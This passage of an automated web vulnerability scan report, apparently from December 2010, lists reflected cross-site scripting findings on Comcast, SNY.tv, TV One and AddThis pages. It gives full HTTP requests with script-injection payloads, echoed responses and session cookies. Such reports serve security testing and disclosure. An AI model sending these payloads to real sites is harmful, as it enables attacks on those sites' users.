GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1419 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/L/2133113156/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002"; var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ...[SNIP]...
The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d61ce"-alert(1)-"5ab7386432 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1440 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17/1279528946/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002"; var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ; var TFSMFlash_ ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798 was submitted in the REST URL parameter 9. This input was echoed as 70249"><img src=a onerror=alert(1)>74ca705f798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x3270249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1495 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... <IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/190952221/x3270249"><img src=a onerror=alert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1e9"><script>alert(1)</script>5881f5fc9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?9a1e9"><script>alert(1)</script>5881f5fc9eb=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1404 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<SCRIPT type="text/javascript"> var TFSMFlash_PRETAG=""; var TFSMFlash_POSTTAG=""; var TFSMFlash_VERSION="6"; var TFSMFlash_WMODE="window"; var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R ...[SNIP]... RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1157883388/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&9a1e9"><script>alert(1)</script>5881f5fc9eb=1" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf35b"><script>alert(1)</script>49f7dfd6bf9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.cgi/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/ HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:14:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 356 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://oascentral.comcast.net
Path:
/RealMedia/ads/adstream_sx.cgi/comcast.net/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e31"><script>alert(1)</script>df1925c3675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.cgi/comcast.net/?62e31"><script>alert(1)</script>df1925c3675=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:14:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 483 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://signup.comcast.net
Path:
/identity/reg
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b994"><script>alert(1)</script>006d67d6e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1 HTTP/1.1 Host: signup.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="Content-Type" content="text/html; charset=utf- ...[SNIP]... <form method="POST" action="https://signup.comcast.net/identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1" onsubmit="return validateSignup(this);" name="signupForm"> ...[SNIP]...
2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tvoneonline.com
Path:
/video/b_player.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dede"><script>alert(1)</script>a693329120d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1 HTTP/1.1 Host: tvoneonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>A Different World, Lincoln Heights, Love That Girl, Way Bl ...[SNIP]... <form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1#comments_anchor" onsubmit="rememberfields()" style="display:none;"> ...[SNIP]...
2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://web.sny.tv
Path:
/fan_zone/messageboard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fa0fc</script><script>alert(1)</script>644720c7edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fan_zone/messageboard/?fa0fc</script><script>alert(1)</script>644720c7edd=1 HTTP/1.1 Host: web.sny.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Host: ct04-dc2 Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 19 Dec 2010 18:30:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 34231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head>
<title>Home | SNY.t ...[SNIP]... section = "fan_zone"; var ctxPath = ""; var pageid = "index"; var dc_keyVal = ""; // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/fan_zone/messageboard/'] // requestQuery: fa0fc</script><script>alert(1)</script>644720c7edd=1 </script> ...[SNIP]...
2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://web.sny.tv
Path:
/media/video.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 40697</script><script>alert(1)</script>e05f1431920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/video.jsp?40697</script><script>alert(1)</script>e05f1431920=1 HTTP/1.1 Host: web.sny.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Host: t01-dc2 Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=7188 Expires: Sun, 19 Dec 2010 20:31:30 GMT Date: Sun, 19 Dec 2010 18:31:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 75019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html ...[SNIP]... var section = "video"; var ctxPath = ""; var pageid = "topic_video"; var dc_keyVal = ""; // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/media/video.jsp'] // requestQuery: 40697</script><script>alert(1)</script>e05f1431920=1 </script> ...[SNIP]...
2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://web.sny.tv
Path:
/news/archive.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload ceb7c</script><script>alert(1)</script>8fba1b30fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/archive.jsp?ceb7c</script><script>alert(1)</script>8fba1b30fa7=1 HTTP/1.1 Host: web.sny.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Host: ct03-dc2 Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=7200 Expires: Sun, 19 Dec 2010 20:30:26 GMT Date: Sun, 19 Dec 2010 18:30:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head>
<title>SNY.tv: News< ...[SNIP]... t"> var section = "news"; var ctxPath = ""; var pageid = "archive"; var dc_keyVal = ""; // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/archive.jsp'] // requestQuery: ceb7c</script><script>alert(1)</script>8fba1b30fa7=1 </script> ...[SNIP]...
2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://web.sny.tv
Path:
/news/columnist.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 83b42</script><script>alert(1)</script>76f090a1843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/columnist.jsp?83b42</script><script>alert(1)</script>76f090a1843=1 HTTP/1.1 Host: web.sny.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Host: ct03-dc2 Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=7200 Expires: Sun, 19 Dec 2010 20:30:24 GMT Date: Sun, 19 Dec 2010 18:30:24 GMT Content-Length: 30481 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head>
<title>SNY Columnis ...[SNIP]... var section = "news"; var ctxPath = ""; var pageid = "columnist"; var dc_keyVal = ""; // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/columnist.jsp'] // requestQuery: 83b42</script><script>alert(1)</script>76f090a1843=1 </script> ...[SNIP]...
2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://web.sny.tv
Path:
/search/media.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload d5034</script><script>alert(1)</script>e5e8c9bf78b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/media.jsp?d5034</script><script>alert(1)</script>e5e8c9bf78b=1 HTTP/1.1 Host: web.sny.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Host: ct01-dc2 Content-Type: text/html;charset=ISO-8859-1 Cache-Control: max-age=7200 Expires: Sun, 19 Dec 2010 20:30:24 GMT Date: Sun, 19 Dec 2010 18:30:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33552
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head>
<title>SN ...[SNIP]... pt"> var section = "media"; var ctxPath = ""; var pageid = "index"; var dc_keyVal = ""; // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/search/media.jsp'] // requestQuery: d5034</script><script>alert(1)</script>e5e8c9bf78b=1 </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3462"-alert(1)-"d0eff2b1478 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpa3462"-alert(1)-"d0eff2b1478 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 19 Dec 2010 18:30:31 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=cjihrpeovelp8v558shmush177; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpa3462"-alert(1)-"d0eff2b1478"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 866d9<script>alert(1)</script>f5c221fed4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php866d9<script>alert(1)</script>f5c221fed4c HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 19 Dec 2010 18:30:32 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=n3ai0ab6isuvt5o8svci4rtgi2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php866d9<script>alert(1)</script>f5c221fed4c</strong> ...[SNIP]...
2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e40a5"-alert(1)-"c1edf7a2e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/e40a5"-alert(1)-"c1edf7a2e70 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:30:28 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 91760
